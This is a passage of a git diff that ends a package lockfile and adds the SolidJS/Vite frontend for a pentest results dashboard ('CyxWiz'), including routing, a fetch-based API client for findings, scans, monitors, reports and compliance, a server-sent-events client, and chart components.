+    "seroval": ["seroval@1.3.2", "", {}, "sha512-RbcPH1n5cfwKrru7v7+zrZvjLurgHhGyso3HTyGtRivGWgYjbOmGuivCQaORNELjNONoK35nj28EoWul9sb1zQ=="],
+
+    "seroval-plugins": ["seroval-plugins@1.3.3", "", { "peerDependencies": { "seroval": "^1.0" } }, "sha512-16OL3NnUBw8JG1jBLUoZJsLnQq0n5Ua6aHalhJK4fMQkz1lqR7Osz1sA30trBtd9VUDc2NgkuRCn8+/pBwqZ+w=="],
+
+    "solid-js": ["solid-js@1.9.10", "", { "dependencies": { "csstype": "^3.1.0", "seroval": "~1.3.0", "seroval-plugins": "~1.3.0" } }, "sha512-Coz956cos/EPDlhs6+jsdTxKuJDPT7B5SVIWgABwROyxjY7Xbr8wkzD68Et+NxnV7DLJ3nJdAC2r9InuV/4Jew=="],
+
+    "solid-refresh": ["solid-refresh@0.6.3", "", { "dependencies": { "@babel/generator": "^7.23.6", "@babel/helper-module-imports": "^7.22.15", "@babel/types": "^7.23.6" }, "peerDependencies": { "solid-js": "^1.3" } }, "sha512-F3aPsX6hVw9ttm5LYlth8Q15x6MlI/J3Dn+o3EQyRTtTxidepSTwAYdozt01/YA+7ObcciagGEyXIopGZzQtbA=="],
+
+    "source-map-js": ["source-map-js@1.2.1", "", {}, "sha512-UXWMKhLOwVKb728IUtQPXxfYU+usdybtUrK/8uGE8CQMvrhOpwvzDBwj0QhSL7MQc7vIsISBG8VQ8+IDQxpfQA=="],
+
+    "sucrase": ["sucrase@3.35.1", "", { "dependencies": { "@jridgewell/gen-mapping": "^0.3.2", "commander": "^4.0.0", "lines-and-columns": "^1.1.6", "mz": "^2.7.0", "pirates": "^4.0.1", "tinyglobby": "^0.2.11", "ts-interface-checker": "^0.1.9" }, "bin": { "sucrase": "bin/sucrase", "sucrase-node": "bin/sucrase-node" } }, "sha512-DhuTmvZWux4H1UOnWMB3sk0sbaCVOoQZjv8u1rDoTV0HTdGem9hkAZtl4JZy8P2z4Bg0nT+YMeOFyVr4zcG5Tw=="],
+
+    "supports-preserve-symlinks-flag": ["supports-preserve-symlinks-flag@1.0.0", "", {}, "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w=="],
+
+    "tailwindcss": ["tailwindcss@3.4.19", "", { "dependencies": { "@alloc/quick-lru": "^5.2.0", "arg": "^5.0.2", "chokidar": "^3.6.0", "didyoumean": "^1.2.2", "dlv": "^1.1.3", "fast-glob": "^3.3.2", "glob-parent": "^6.0.2", "is-glob": "^4.0.3", "jiti": "^1.21.7", "lilconfig": "^3.1.3", "micromatch": "^4.0.8", "normalize-path": "^3.0.0", "object-hash": "^3.0.0", "picocolors": "^1.1.1", "postcss": "^8.4.47", "postcss-import": "^15.1.0", "postcss-js": "^4.0.1", "postcss-load-config": "^4.0.2 || ^5.0 || ^6.0", "postcss-nested": "^6.2.0", "postcss-selector-parser": "^6.1.2", "resolve": "^1.22.8", "sucrase": "^3.35.0" }, "bin": { "tailwind": "lib/cli.js", "tailwindcss": "lib/cli.js" } }, "sha512-3ofp+LL8E+pK/JuPLPggVAIaEuhvIz4qNcf3nA1Xn2o/7fb7s/TYpHhwGDv1ZU3PkBluUVaF8PyCHcm48cKLWQ=="],
+
+    "thenify": ["thenify@3.3.1", "", { "dependencies": { "any-promise": "^1.0.0" } }, "sha512-RVZSIV5IG10Hk3enotrhvz0T9em6cyHBLkH/YAZuKqd8hRkKhSfCGIcP2KUY0EPxndzANBmNllzWPwak+bheSw=="],
+
+    "thenify-all": ["thenify-all@1.6.0", "", { "dependencies": { "thenify": ">= 3.1.0 < 4" } }, "sha512-RNxQH/qI8/t3thXJDwcstUO4zeqo64+Uy/+sNVRBx4Xn2OX+OZ9oP+iJnNFqplFra2ZUVeKCSa2oVWi3T4uVmA=="],
+
+    "tinyglobby": ["tinyglobby@0.2.15", "", { "dependencies": { "fdir": "^6.5.0", "picomatch": "^4.0.3" } }, "sha512-j2Zq4NyQYG5XMST4cbs02Ak8iJUdxRM0XI5QyxXuZOzKOINmWurp3smXu3y5wDcJrptwpSjgXHzIQxR0omXljQ=="],
+
+    "to-regex-range": ["to-regex-range@5.0.1", "", { "dependencies": { "is-number": "^7.0.0" } }, "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ=="],
+
+    "ts-interface-checker": ["ts-interface-checker@0.1.13", "", {}, "sha512-Y/arvbn+rrz3JCKl9C4kVNfTfSm2/mEp5FSz5EsZSANGPSlQrpRI5M4PKF+mJnE52jOO90PnPSc3Ur3bTQw0gA=="],
+
+    "typescript": ["typescript@5.9.3", "", { "bin": { "tsc": "bin/tsc", "tsserver": "bin/tsserver" } }, "sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw=="],
+
+    "undici-types": ["undici-types@6.21.0", "", {}, "sha512-iwDZqg0QAGrg9Rav5H4n0M64c3mkR59cJ6wQp+7C4nI0gsmExaedaYLNO44eT4AtBBwjbTiGPMlt2Md0T9H9JQ=="],
+
+    "update-browserslist-db": ["update-browserslist-db@1.2.3", "", { "dependencies": { "escalade": "^3.2.0", "picocolors": "^1.1.1" }, "peerDependencies": { "browserslist": ">= 4.21.0" }, "bin": { "update-browserslist-db": "cli.js" } }, "sha512-Js0m9cx+qOgDxo0eMiFGEueWztz+d4+M3rGlmKPT+T4IS/jP4ylw3Nwpu6cpTTP8R1MAC1kF4VbdLt3ARf209w=="],
+
+    "util-deprecate": ["util-deprecate@1.0.2", "", {}, "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw=="],
+
+    "vite": ["vite@6.4.1", "", { "dependencies": { "esbuild": "^0.25.0", "fdir": "^6.4.4", "picomatch": "^4.0.2", "postcss": "^8.5.3", "rollup": "^4.34.9", "tinyglobby": "^0.2.13" }, "optionalDependencies": { "fsevents": "~2.3.3" }, "peerDependencies": { "@types/node": "^18.0.0 || ^20.0.0 || >=22.0.0", "jiti": ">=1.21.0", "less": "*", "lightningcss": "^1.21.0", "sass": "*", "sass-embedded": "*", "stylus": "*", "sugarss": "*", "terser": "^5.16.0", "tsx": "^4.8.1", "yaml": "^2.4.2" }, "optionalPeers": ["@types/node", "jiti", "less", "lightningcss", "sass", "sass-embedded", "stylus", "sugarss", "terser", "tsx", "yaml"], "bin": { "vite": "bin/vite.js" } }, "sha512-+Oxm7q9hDoLMyJOYfUYBuHQo+dkAloi33apOPP56pzj+vsdJDzr+j1NISE5pyaAuKL4A3UD34qd0lx5+kfKp2g=="],
+
+    "vite-plugin-solid": ["vite-plugin-solid@2.11.10", "", { "dependencies": { "@babel/core": "^7.23.3", "@types/babel__core": "^7.20.4", "babel-preset-solid": "^1.8.4", "merge-anything": "^5.1.7", "solid-refresh": "^0.6.3", "vitefu": "^1.0.4" }, "peerDependencies": { "@testing-library/jest-dom": "^5.16.6 || ^5.17.0 || ^6.*", "solid-js": "^1.7.2", "vite": "^3.0.0 || ^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0" }, "optionalPeers": ["@testing-library/jest-dom"] }, "sha512-Yr1dQybmtDtDAHkii6hXuc1oVH9CPcS/Zb2jN/P36qqcrkNnVPsMTzQ06jyzFPFjj3U1IYKMVt/9ZqcwGCEbjw=="],
+
+    "vitefu": ["vitefu@1.1.1", "", { "peerDependencies": { "vite": "^3.0.0 || ^4.0.0 || ^5.0.0 || ^6.0.0 || ^7.0.0-beta.0" }, "optionalPeers": ["vite"] }, "sha512-B/Fegf3i8zh0yFbpzZ21amWzHmuNlLlmJT6n7bu5e+pCHUKQIfXSYokrqOBGEMMe9UG2sostKQF9mml/vYaWJQ=="],
+
+    "yallist": ["yallist@3.1.1", "", {}, "sha512-a4UGQaWPH59mOXUYnAG2ewncQS4i4F43Tv3JoAM+s2VDAmS9NsK8GpDMLrCHPksFT7h3K6TOoUNn2pb7RoXx4g=="],
+
+    "anymatch/picomatch": ["picomatch@2.3.1", "", {}, "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA=="],
+
+    "babel-plugin-jsx-dom-expressions/@babel/helper-module-imports": ["@babel/helper-module-imports@7.18.6", "", { "dependencies": { "@babel/types": "^7.18.6" } }, "sha512-0NFvs3VkuSYbFi1x2Vd6tKrywq+z/cLeYC/RJNFrIX/30Bf5aiGYbtvGXolEktzJH8o5E5KJ3tT+nkxuuZFVlA=="],
+
+    "chokidar/glob-parent": ["glob-parent@5.1.2", "", { "dependencies": { "is-glob": "^4.0.1" } }, "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow=="],
+
+    "fast-glob/glob-parent": ["glob-parent@5.1.2", "", { "dependencies": { "is-glob": "^4.0.1" } }, "sha512-AOIgSQCepiJYwP3ARnGx+5VnTu2HBYdzbGP45eLw1vr3zB3vZLeyed1sC9hnbcOc9/SrMyM5RPQrkGz4aS9Zow=="],
+
+    "micromatch/picomatch": ["picomatch@2.3.1", "", {}, "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA=="],
+
+    "readdirp/picomatch": ["picomatch@2.3.1", "", {}, "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA=="],
+  }
+}
diff --git a/packages/opencode/src/dashboard/index.html b/packages/opencode/src/dashboard/index.html
new file mode 100644
index 00000000000..124e6a27f5d
--- /dev/null
+++ b/packages/opencode/src/dashboard/index.html
@@ -0,0 +1,13 @@
+<!DOCTYPE html>
+<html lang="en">
+  <head>
+    <meta charset="UTF-8" />
+    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <title>CyxWiz Pentest Dashboard</title>
+    <link rel="icon" type="image/svg+xml" href="data:image/svg+xml,<svg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 100 100'><text y='.9em' font-size='90'>🛡️</text></svg>" />
+  </head>
+  <body class="bg-gray-900 text-gray-100">
+    <div id="root"></div>
+    <script type="module" src="/src/index.tsx"></script>
+  </body>
+</html>
diff --git a/packages/opencode/src/dashboard/package.json b/packages/opencode/src/dashboard/package.json
new file mode 100644
index 00000000000..95ab7292d04
--- /dev/null
+++ b/packages/opencode/src/dashboard/package.json
@@ -0,0 +1,24 @@
+{
+  "name": "@cyxwiz/dashboard",
+  "version": "1.0.0",
+  "private": true,
+  "type": "module",
+  "scripts": {
+    "dev": "vite",
+    "build": "vite build",
+    "preview": "vite preview"
+  },
+  "dependencies": {
+    "@solidjs/router": "^0.15.3",
+    "solid-js": "^1.9.4"
+  },
+  "devDependencies": {
+    "@types/node": "^22.10.2",
+    "autoprefixer": "^10.4.20",
+    "postcss": "^8.4.49",
+    "tailwindcss": "^3.4.17",
+    "typescript": "^5.7.2",
+    "vite": "^6.0.6",
+    "vite-plugin-solid": "^2.11.0"
+  }
+}
diff --git a/packages/opencode/src/dashboard/postcss.config.js b/packages/opencode/src/dashboard/postcss.config.js
new file mode 100644
index 00000000000..2e7af2b7f1a
--- /dev/null
+++ b/packages/opencode/src/dashboard/postcss.config.js
@@ -0,0 +1,6 @@
+export default {
+  plugins: {
+    tailwindcss: {},
+    autoprefixer: {},
+  },
+}
diff --git a/packages/opencode/src/dashboard/src/App.tsx b/packages/opencode/src/dashboard/src/App.tsx
new file mode 100644
index 00000000000..4bf5dedc9f1
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/App.tsx
@@ -0,0 +1,56 @@
+import { Component, createSignal, onMount, onCleanup, lazy, Suspense, ParentProps } from "solid-js"
+import { Router, Route } from "@solidjs/router"
+import { Layout } from "./components/layout/Layout"
+import { sseClient } from "./api/sse"
+
+// Lazy load pages for code splitting
+const Dashboard = lazy(() => import("./pages/Dashboard"))
+const Findings = lazy(() => import("./pages/Findings"))
+const Scans = lazy(() => import("./pages/Scans"))
+const Monitors = lazy(() => import("./pages/Monitors"))
+const Compliance = lazy(() => import("./pages/Compliance"))
+const Reports = lazy(() => import("./pages/Reports"))
+
+const Loading: Component = () => (
+  <div class="flex items-center justify-center h-64">
+    <div class="animate-spin rounded-full h-8 w-8 border-b-2 border-blue-500"></div>
+  </div>
+)
+
+export const App: Component = () => {
+  const [connected, setConnected] = createSignal(false)
+
+  onMount(() => {
+    // Connect to SSE for real-time updates
+    sseClient.connect()
+    sseClient.onConnect(() => setConnected(true))
+    sseClient.onDisconnect(() => setConnected(false))
+  })
+
+  onCleanup(() => {
+    sseClient.disconnect()
+  })
+
+  const RootLayout = (props: ParentProps) => (
+    <Layout connected={connected()}>
+      <Suspense fallback={<Loading />}>
+        {props.children}
+      </Suspense>
+    </Layout>
+  )
+
+  return (
+    <Router base="/dashboard" root={RootLayout}>
+      <Route path="/" component={Dashboard} />
+      <Route path="/findings" component={Findings} />
+      <Route path="/findings/:id" component={Findings} />
+      <Route path="/scans" component={Scans} />
+      <Route path="/scans/:id" component={Scans} />
+      <Route path="/monitors" component={Monitors} />
+      <Route path="/monitors/:id" component={Monitors} />
+      <Route path="/compliance" component={Compliance} />
+      <Route path="/compliance/:framework" component={Compliance} />
+      <Route path="/reports" component={Reports} />
+    </Router>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/api/client.ts b/packages/opencode/src/dashboard/src/api/client.ts
new file mode 100644
index 00000000000..ff6523f1739
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/api/client.ts
@@ -0,0 +1,375 @@
+/**
+ * API Client for Dashboard
+ *
+ * Fetch wrapper for communicating with the pentest API endpoints.
+ */
+
+const API_BASE = ""
+
+export interface ApiResponse<T> {
+  data?: T
+  error?: string
+}
+
+async function request<T>(path: string, options: RequestInit = {}): Promise<ApiResponse<T>> {
+  try {
+    const response = await fetch(`${API_BASE}${path}`, {
+      ...options,
+      headers: {
+        "Content-Type": "application/json",
+        ...options.headers,
+      },
+    })
+
+    const data = await response.json()
+
+    if (!response.ok) {
+      return { error: data.error || `HTTP ${response.status}` }
+    }
+
+    return { data }
+  } catch (err) {
+    console.error("API request failed:", path, err)
+    return { error: err instanceof Error ? err.message : String(err) }
+  }
+}
+
+// ============================================================================
+// Findings API
+// ============================================================================
+
+export interface Finding {
+  id: string
+  sessionID: string
+  scanID?: string
+  title: string
+  description: string
+  severity: "critical" | "high" | "medium" | "low" | "info"
+  status: "open" | "confirmed" | "mitigated" | "false_positive"
+  target: string
+  port?: number
+  protocol?: "tcp" | "udp" | "sctp"
+  service?: string
+  evidence?: string
+  remediation?: string
+  references?: string[]
+  cve?: string[]
+  createdAt: number
+  updatedAt?: number
+}
+
+export interface FindingsResponse {
+  findings: Finding[]
+  total: number
+}
+
+export interface FindingFilters {
+  sessionID?: string
+  scanID?: string
+  severity?: string
+  status?: string
+  target?: string
+  limit?: number
+}
+
+export const findingsApi = {
+  list: (filters?: FindingFilters) => {
+    const params = new URLSearchParams()
+    if (filters) {
+      Object.entries(filters).forEach(([key, value]) => {
+        if (value !== undefined) params.set(key, String(value))
+      })
+    }
+    const query = params.toString() ? `?${params.toString()}` : ""
+    return request<FindingsResponse>(`/pentest/findings${query}`)
+  },
+
+  get: (id: string) => request<{ finding: Finding }>(`/pentest/findings/${id}`),
+
+  update: (id: string, updates: Partial<Pick<Finding, "status" | "remediation" | "evidence">>) =>
+    request<{ finding: Finding }>(`/pentest/findings/${id}`, {
+      method: "PATCH",
+      body: JSON.stringify(updates),
+    }),
+
+  delete: (id: string) =>
+    request<{ success: boolean }>(`/pentest/findings/${id}`, {
+      method: "DELETE",
+    }),
+}
+
+// ============================================================================
+// Scans API
+// ============================================================================
+
+export interface ScanResult {
+  id: string
+  sessionID: string
+  scanType: "port" | "service" | "vuln" | "web" | "custom"
+  target: string
+  command: string
+  startTime: number
+  endTime?: number
+  hosts: Array<{
+    address: string
+    hostname?: string
+    status: "up" | "down" | "unknown"
+    ports: Array<{
+      portid: number
+      protocol: "tcp" | "udp"
+      state: string
+      service?: {
+        name: string
+        version?: string
+      }
+    }>
+  }>
+  summary?: string
+}
+
+export interface ScansResponse {
+  scans: ScanResult[]
+  total: number
+}
+
+export const scansApi = {
+  list: (filters?: { sessionID?: string; target?: string; scanType?: string; limit?: number }) => {
+    const params = new URLSearchParams()
+    if (filters) {
+      Object.entries(filters).forEach(([key, value]) => {
+        if (value !== undefined) params.set(key, String(value))
+      })
+    }
+    const query = params.toString() ? `?${params.toString()}` : ""
+    return request<ScansResponse>(`/pentest/scans${query}`)
+  },
+
+  get: (id: string) => request<{ scan: ScanResult }>(`/pentest/scans/${id}`),
+}
+
+// ============================================================================
+// Statistics API
+// ============================================================================
+
+export interface OverviewStats {
+  findings: {
+    total: number
+    bySeverity: Record<string, number>
+    byStatus: Record<string, number>
+    openCriticalHigh: number
+  }
+  scans: {
+    total: number
+    last24h: number
+    activeMonitors: number
+  }
+  remediation: {
+    mitigatedLast7d: number
+    avgTimeToMitigate: number
+  }
+}
+
+export interface TrendData {
+  date: string
+  created: number
+  mitigated: number
+}
+
+export const statsApi = {
+  overview: () => request<OverviewStats>(`/pentest/stats/overview`),
+
+  severity: () => request<{ distribution: Record<string, number> }>(`/pentest/stats/severity`),
+
+  trends: (days = 30) => request<{ trends: TrendData[]; days: number }>(`/pentest/stats/trends?days=${days}`),
+}
+
+// ============================================================================
+// Monitors API
+// ============================================================================
+
+export interface Monitor {
+  id: string
+  name: string
+  description?: string
+  sessionID: string
+  targets: string[]
+  tools: Array<{
+    tool: string
+    enabled: boolean
+    config?: Record<string, unknown>
+  }>
+  schedule: {
+    type: "interval" | "cron"
+    interval?: number
+    cron?: string
+  }
+  status: "active" | "paused" | "disabled" | "error"
+  alerts: {
+    enabled: boolean
+    minSeverity: string
+    newFindingsOnly: boolean
+    channels: string[]
+  }
+  tags?: string[]
+  createdAt: number
+  updatedAt?: number
+  lastRunAt?: number
+  nextRunAt?: number
+  runCount: number
+  lastError?: string
+}
+
+export interface MonitorRun {
+  id: string
+  monitorID: string
+  sessionID: string
+  startTime: number
+  endTime?: number
+  status: "running" | "completed" | "failed" | "cancelled"
+  scanIDs: string[]
+  findingIDs: string[]
+  newFindingIDs: string[]
+  resolvedFindingIDs: string[]
+  error?: string
+  runNumber: number
+}
+
+export const monitorsApi = {
+  list: (filters?: { sessionID?: string; status?: string }) => {
+    const params = new URLSearchParams()
+    if (filters) {
+      Object.entries(filters).forEach(([key, value]) => {
+        if (value !== undefined) params.set(key, String(value))
+      })
+    }
+    const query = params.toString() ? `?${params.toString()}` : ""
+    return request<{ monitors: Monitor[]; total: number }>(`/pentest/monitors${query}`)
+  },
+
+  get: (id: string) => request<{ monitor: Monitor }>(`/pentest/monitors/${id}`),
+
+  triggerRun: (id: string) =>
+    request<{ success: boolean; runId: string }>(`/pentest/monitors/${id}/run`, {
+      method: "POST",
+    }),
+
+  listRuns: (id: string, limit?: number) => {
+    const query = limit ? `?limit=${limit}` : ""
+    return request<{ runs: MonitorRun[]; total: number }>(`/pentest/monitors/${id}/runs${query}`)
+  },
+}
+
+// ============================================================================
+// Reports API
+// ============================================================================
+
+export interface Report {
+  id: string
+  type: "executive" | "technical" | "compliance"
+  generatedAt: number
+  summary?: unknown
+  targets?: unknown[]
+  assessment?: unknown
+}
+
+export interface ReportRequest {
+  type: "executive" | "technical" | "compliance"
+  filters?: {
+    sessionID?: string
+    severity?: string[]
+    status?: string[]
+    dateRange?: {
+      start: number
+      end: number
+    }
+  }
+  framework?: "pci-dss" | "hipaa" | "soc2"
+}
+
+export const reportsApi = {
+  generate: (req: ReportRequest) =>
+    request<{ report: Report }>(`/pentest/reports`, {
+      method: "POST",
+      body: JSON.stringify(req),
+    }),
+
+  get: (id: string) => request<{ report: Report }>(`/pentest/reports/${id}`),
+}
+
+// ============================================================================
+// Compliance API
+// ============================================================================
+
+export interface ComplianceFramework {
+  id: "pci-dss" | "hipaa" | "soc2"
+  name: string
+  version: string
+  description: string
+  categories: Array<{
+    id: string
+    name: string
+    description?: string
+  }>
+  controlCount: number
+}
+
+export interface ComplianceControl {
+  id: string
+  framework: string
+  category: string
+  name: string
+  description: string
+  priority: "critical" | "high" | "medium" | "low"
+  keywords: string[]
+  cweIds?: number[]
+  services?: string[]
+  severities?: string[]
+  remediation?: string
+  reference?: string
+}
+
+export interface ComplianceAssessment {
+  framework: string
+  timestamp: number
+  controls: Array<{
+    control: ComplianceControl
+    status: "pass" | "fail" | "partial" | "not_assessed"
+    findings: string[]
+    notes?: string
+  }>
+  score: {
+    total: number
+    passed: number
+    failed: number
+    partial: number
+    notAssessed: number
+    percentage: number
+  }
+}
+
+export const complianceApi = {
+  listFrameworks: () => request<{ frameworks: ComplianceFramework[] }>(`/pentest/compliance/frameworks`),
+
+  getFramework: (id: string) =>
+    request<{
+      framework: string
+      controls: ComplianceControl[]
+      categories: Array<{ id: string; name: string; description?: string }>
+    }>(`/pentest/compliance/${id}`),
+
+  getMapping: (framework: string) =>
+    request<{
+      framework: string
+      mapping: Array<{
+        findingId: string
+        controlIds: string[]
+        confidence: string
+        matchReason: string
+      }>
+    }>(`/pentest/compliance/${framework}/map`),
+
+  assess: (framework: string) =>
+    request<{ assessment: ComplianceAssessment }>(`/pentest/compliance/${framework}/assess`, {
+      method: "POST",
+    }),
+}
diff --git a/packages/opencode/src/dashboard/src/api/sse.ts b/packages/opencode/src/dashboard/src/api/sse.ts
new file mode 100644
index 00000000000..3da77134c42
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/api/sse.ts
@@ -0,0 +1,131 @@
+/**
+ * SSE Client for Real-time Updates
+ *
+ * Subscribes to server-sent events for live dashboard updates.
+ */
+
+export type PentestEventType =
+  | "pentest.finding_created"
+  | "pentest.finding_updated"
+  | "pentest.scan_started"
+  | "pentest.scan_completed"
+  | "pentest.monitor.run_started"
+  | "pentest.monitor.run_completed"
+  | "pentest.monitor.run_failed"
+  | "pentest.monitor.alert.new_vulnerabilities"
+  | "server.connected"
+  | "server.heartbeat"
+
+export interface SSEEvent {
+  type: PentestEventType
+  properties: Record<string, unknown>
+}
+
+type EventCallback = (event: SSEEvent) => void
+
+class SSEClient {
+  private eventSource: EventSource | null = null
+  private listeners: Map<string, Set<EventCallback>> = new Map()
+  private connectCallbacks: Set<() => void> = new Set()
+  private disconnectCallbacks: Set<() => void> = new Set()
+  private reconnectAttempts = 0
+  private maxReconnectAttempts = 5
+  private reconnectDelay = 1000
+
+  connect() {
+    if (this.eventSource) {
+      return
+    }
+
+    try {
+      this.eventSource = new EventSource("/global/event")
+
+      this.eventSource.onopen = () => {
+        this.reconnectAttempts = 0
+        this.connectCallbacks.forEach((cb) => cb())
+      }
+
+      this.eventSource.onmessage = (event) => {
+        try {
+          const data = JSON.parse(event.data)
+          const payload = data.payload as SSEEvent
+
+          if (payload?.type) {
+            this.emit(payload.type, payload)
+            this.emit("*", payload) // Wildcard listeners
+          }
+        } catch {
+          console.error("Failed to parse SSE event:", event.data)
+        }
+      }
+
+      this.eventSource.onerror = () => {
+        this.handleDisconnect()
+      }
+    } catch (err) {
+      console.error("Failed to create EventSource:", err)
+      this.handleDisconnect()
+    }
+  }
+
+  private handleDisconnect() {
+    if (this.eventSource) {
+      this.eventSource.close()
+      this.eventSource = null
+    }
+
+    this.disconnectCallbacks.forEach((cb) => cb())
+
+    // Attempt reconnect
+    if (this.reconnectAttempts < this.maxReconnectAttempts) {
+      this.reconnectAttempts++
+      const delay = this.reconnectDelay * Math.pow(2, this.reconnectAttempts - 1)
+      setTimeout(() => this.connect(), delay)
+    }
+  }
+
+  disconnect() {
+    if (this.eventSource) {
+      this.eventSource.close()
+      this.eventSource = null
+    }
+    this.listeners.clear()
+  }
+
+  on(eventType: PentestEventType | "*", callback: EventCallback) {
+    if (!this.listeners.has(eventType)) {
+      this.listeners.set(eventType, new Set())
+    }
+    this.listeners.get(eventType)!.add(callback)
+
+    // Return unsubscribe function
+    return () => {
+      this.listeners.get(eventType)?.delete(callback)
+    }
+  }
+
+  off(eventType: PentestEventType | "*", callback: EventCallback) {
+    this.listeners.get(eventType)?.delete(callback)
+  }
+
+  private emit(eventType: string, event: SSEEvent) {
+    this.listeners.get(eventType)?.forEach((cb) => cb(event))
+  }
+
+  onConnect(callback: () => void) {
+    this.connectCallbacks.add(callback)
+    return () => this.connectCallbacks.delete(callback)
+  }
+
+  onDisconnect(callback: () => void) {
+    this.disconnectCallbacks.add(callback)
+    return () => this.disconnectCallbacks.delete(callback)
+  }
+
+  isConnected(): boolean {
+    return this.eventSource !== null && this.eventSource.readyState === EventSource.OPEN
+  }
+}
+
+// Singleton instance
+export const sseClient = new SSEClient()
diff --git a/packages/opencode/src/dashboard/src/components/charts/ComplianceRadar.tsx b/packages/opencode/src/dashboard/src/components/charts/ComplianceRadar.tsx
new file mode 100644
index 00000000000..bf48fa66654
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/charts/ComplianceRadar.tsx
@@ -0,0 +1,172 @@
+import { Component, createMemo, For } from "solid-js"
+
+interface CategoryScore {
+  category: string
+  name: string
+  percentage: number
+}
+
+interface ComplianceRadarProps {
+  data: CategoryScore[]
+  size?: number
+}
+
+export const ComplianceRadar: Component<ComplianceRadarProps> = (props) => {
+  const size = () => props.size || 300
+  const center = () => size() / 2
+  const maxRadius = () => (size() / 2) - 40
+
+  const points = createMemo(() => {
+    const count = props.data.length
+    if (count === 0) return []
+
+    const angleStep = (2 * Math.PI) / count
+
+    return props.data.map((d, i) => {
+      const angle = angleStep * i - Math.PI / 2 // Start at top
+      const radius = (d.percentage / 100) * maxRadius()
+      return {
+        ...d,
+        x: center() + radius * Math.cos(angle),
+        y: center() + radius * Math.sin(angle),
+        labelX: center() + (maxRadius() + 20) * Math.cos(angle),
+        labelY: center() + (maxRadius() + 20) * Math.sin(angle),
+        angle,
+      }
+    })
+  })
+
+  const polygonPath = createMemo(() => {
+    if (points().length === 0) return ""
+    return points()
+      .map((p, i) => `${i === 0 ? "M" : "L"} ${p.x} ${p.y}`)
+      .join(" ") + " Z"
+  })
+
+  // Generate concentric circles for grid
+  const gridCircles = [20, 40, 60, 80, 100]
+
+  // Generate axis lines
+  const axisLines = createMemo(() => {
+    const count = props.data.length
+    if (count === 0) return []
+
+    const angleStep = (2 * Math.PI) / count
+
+    return props.data.map((_, i) => {
+      const angle = angleStep * i - Math.PI / 2
+      return {
+        x: center() + maxRadius() * Math.cos(angle),
+        y: center() + maxRadius() * Math.sin(angle),
+      }
+    })
+  })
+
+  return (
+    <div class="flex flex-col items-center">
+      <svg width={size()} height={size()}>
+        {/* Grid circles */}
+        <For each={gridCircles}>
+          {(pct) => (
+            <circle
+              cx={center()}
+              cy={center()}
+              r={(pct / 100) * maxRadius()}
+              fill="none"
+              stroke="#374151"
+              stroke-width="1"
+            />
+          )}
+        </For>
+
+        {/* Axis lines */}
+        <For each={axisLines()}>
+          {(line) => (
+            <line
+              x1={center()}
+              y1={center()}
+              x2={line.x}
+              y2={line.y}
+              stroke="#374151"
+              stroke-width="1"
+            />
+          )}
+        </For>
+
+        {/* Data polygon */}
+        <path
+          d={polygonPath()}
+          fill="rgba(59, 130, 246, 0.3)"
+          stroke="#3b82f6"
+          stroke-width="2"
+        />
+
+        {/* Data points */}
+        <For each={points()}>
+          {(point) => (
+            <g>
+              <circle
+                cx={point.x}
+                cy={point.y}
+                r="4"
+                fill="#3b82f6"
+              >
+                <title>{point.name}: {point.percentage}%</title>
+              </circle>
+            </g>
+          )}
+        </For>
+
+        {/* Labels */}
+        <For each={points()}>
+          {(point) => (
+            <text
+              x={point.labelX}
+              y={point.labelY}
+              text-anchor={
+                Math.abs(point.angle + Math.PI / 2) < 0.1 ? "middle" :
+                Math.cos(point.angle) > 0 ? "start" : "end"
+              }
+              dominant-baseline="middle"
+              class="text-xs fill-gray-400"
+            >
+              {point.category}
+            </text>
+          )}
+        </For>
+
+        {/* Center percentage labels */}
+        <For each={gridCircles}>
+          {(pct) => (
+            <text
+              x={center() + 5}
+              y={center() - (pct / 100) * maxRadius()}
+              class="text-xs fill-gray-500"
+            >
+              {pct}%
+            </text>
+          )}
+        </For>
+      </svg>
+
+      {/* Legend */}
+      <div class="mt-4 grid grid-cols-2 gap-2 text-sm">
+        <For each={props.data}>
+          {(item) => (
+            <div class="flex items-center gap-2">
+              <div class="w-2 h-2 rounded-full bg-blue-500" />
+              <span class="text-gray-400">{item.name}:</span>
+              <span class={`font-medium ${
+                item.percentage >= 80 ? "text-green-400" :
+                item.percentage >= 50 ? "text-yellow-400" :
+                "text-red-400"
+              }`}>
+                {item.percentage}%
+              </span>
+            </div>
+          )}
+        </For>
+      </div>
+    </div>
+  )
+}
diff --git a/packages/opencode/src/dashboard/src/components/charts/SeverityPie.tsx b/packages/opencode/src/dashboard/src/components/charts/SeverityPie.tsx
new file mode 100644
index 00000000000..df5a8e5437a
--- /dev/null
+++ b/packages/opencode/src/dashboard/src/components/charts/SeverityPie.tsx
@@ -0,0 +1,146 @@
+import { Component, createMemo, For } from "solid-js"
+
+interface SeverityPieProps {
+  data: Record<string, number>
+  size?: number
+}
+
+const severityColors = {
+  critical: "#dc2626",
